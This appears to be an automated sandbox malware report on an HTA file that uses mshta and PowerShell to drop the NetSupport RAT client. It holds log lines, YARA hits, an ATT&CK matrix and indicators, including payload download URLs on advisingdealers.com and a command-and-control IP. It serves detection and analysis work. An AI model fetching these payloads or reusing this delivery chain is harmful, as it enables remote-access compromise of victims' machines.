                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D66A24 CreateNamedPipeW,2_2_06D66A24
                                Source: Yara matchFile source: 22.0.client32.exe.1230000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.0.client32.exe.1230000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.6c230000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.6e420000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.1230000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.6c230000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.6e420000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.1230000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.6f180000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 22.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000016.00000000.323306200.0000000001232000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.325285064.0000000001232000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000000.320629163.0000000001232000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.325490052.00000000111E1000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000003.325062224.0000000003C05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.517350632.0000000002D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.517107159.0000000001232000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000003.325155837.0000000003C0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.520439139.000000006F1C0000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.325451942.0000000011193000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 8048, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\MediaContent\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\MediaContent\remcmdstub.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\MediaContent\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\MediaContent\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\MediaContent\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\MediaContent\PCICL32.DLL, type: DROPPED
                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                Valid Accounts1
                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                13
                                Process Injection
                                1
                                Masquerading
                                OS Credential Dumping121
                                Security Software Discovery
                                Remote Services1
                                Email Collection
                                Exfiltration Over Other Network Medium11
                                Encrypted Channel
                                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                                Default Accounts21
                                Command and Scripting Interpreter
                                Boot or Logon Initialization Scripts1
                                DLL Side-Loading
                                41
                                Virtualization/Sandbox Evasion
                                LSASS Memory2
                                Process Discovery
                                Remote Desktop Protocol1
                                Archive Collected Data
                                Exfiltration Over Bluetooth3
                                Ingress Tool Transfer
                                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain Accounts21
                                PowerShell
                                Logon Script (Windows)Logon Script (Windows)13
                                Process Injection
                                Security Account Manager41
                                Virtualization/Sandbox Evasion
                                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                                Non-Application Layer Protocol
                                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                                Obfuscated Files or Information
                                NTDS1
                                Application Window Discovery
                                Distributed Component Object ModelInput CaptureScheduled Transfer5
                                Application Layer Protocol
                                SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                                Software Packing
                                LSA Secrets1
                                Remote System Discovery
                                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.commonRc.common1
                                Timestomp
                                Cached Domain Credentials2
                                File and Directory Discovery
                                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                                DLL Side-Loading
                                DCSync22
                                System Information Discovery
                                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1305463 Sample: Client_version(updater).hta Startdate: 07/09/2023 Architecture: WINDOWS Score: 100 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 Sigma detected: Powershell drops NetSupport RAT client 2->61 63 2 other signatures 2->63 9 mshta.exe 19 2->9         started        12 client32.exe 2->12         started        process3 signatures4 65 Suspicious powershell command line found 9->65 67 Very long command line found 9->67 14 powershell.exe 12 9->14         started        process5 signatures6 69 Very long command line found 14->69 71 Suspicious command line found 14->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 14->73 75 Powershell drops PE file 14->75 17 cmd.exe 1 14->17         started        20 conhost.exe 14->20         started        process7 signatures8 53 Suspicious powershell command line found 17->53 55 Very long command line found 17->55 22 powershell.exe 15 73 17->22         started        26 powershell.exe 15 17->26         started        28 conhost.exe 17->28         started        process9 dnsIp10 41 advisingdealers.com 162.215.249.83, 443, 49722, 49729 PUBLIC-DOMAIN-REGISTRYUS United States 22->41 43 www.advisingdealers.com 22->43 45 duet-cdn.vox-cdn.com 22->45 33 C:\Users\user\AppData\Roaming\client32.exe, PE32 22->33 dropped 35 C:\Users\user\AppData\...\remcmdstub.exe, PE32 22->35 dropped 37 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 22->37 dropped 39 10 other files (9 malicious) 22->39 dropped 30 client32.exe 16 22->30         started        file11 process12 dnsIp13 47 5.252.178.51, 443, 49730 MIVOCLOUDMD Moldova Republic of 30->47 49 geography.netsupportsoftware.com 62.172.138.8, 49731, 49732, 49737 BTGB United Kingdom 30->49 51 geo.netsupportsoftware.com 30->51

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                Client_version(updater).hta18%ReversingLabsScript-WScript.Trojan.Valyria
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\MediaContent\HTCTL32.DLL3%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\PCICHEK.DLL3%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\PCICL32.DLL3%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\TCCTL32.DLL3%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\bootuwf.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\bootvhd.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\client32.exe (copy)29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\user\AppData\Roaming\MediaContent\memtest.exe0%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Roaming\MediaContent\remcmdstub.exe5%ReversingLabs
                                C:\Users\user\AppData\Roaming\client32.exe29%ReversingLabsWin32.Trojan.NetSupport
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://www.pci.co.uk/support0%URL Reputationsafe
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                http://www.pci.co.uk/supportsupport0%URL Reputationsafe
                                https://go.micro0%URL Reputationsafe
                                https://contoso.com/License0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                http://127.0.0.1RESUMEPRINTING0%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://www.advisingdealers.com/wp-content/uploads/2018/01/client32.exe0%Avira URL Cloudsafe
                                https://www.advisingdealers.com/wp-content/uploads/2018/01/MediaContent.zip0%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                http://pesterbdd.com/images/Pester.pngPI100%Avira URL Cloudmalware
                                http://geo.netsupportsoftware.comlocation/loca.asp0%Avira URL Cloudsafe
                                http://5.252.178.51/fakeurl.htm0%Avira URL Cloudsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geography.netsupportsoftware.com
                                62.172.138.8
                                truefalse
                                  high
                                  advisingdealers.com
                                  162.215.249.83
                                  truefalse
                                    unknown
                                    geo.netsupportsoftware.com
                                    unknown
                                    unknownfalse
                                      high
                                      duet-cdn.vox-cdn.com
                                      unknown
                                      unknownfalse
                                        high
                                        www.advisingdealers.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          http://geo.netsupportsoftware.com/location/loca.aspfalse
                                            high
                                            http://5.252.178.51/fakeurl.htmfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.advisingdealers.com/wp-content/uploads/2018/01/client32.exefalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.advisingdealers.com/wp-content/uploads/2018/01/MediaContent.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.270662092.00000000052B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.pci.co.uk/supportclient32.exe, 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpfalse
                                                high
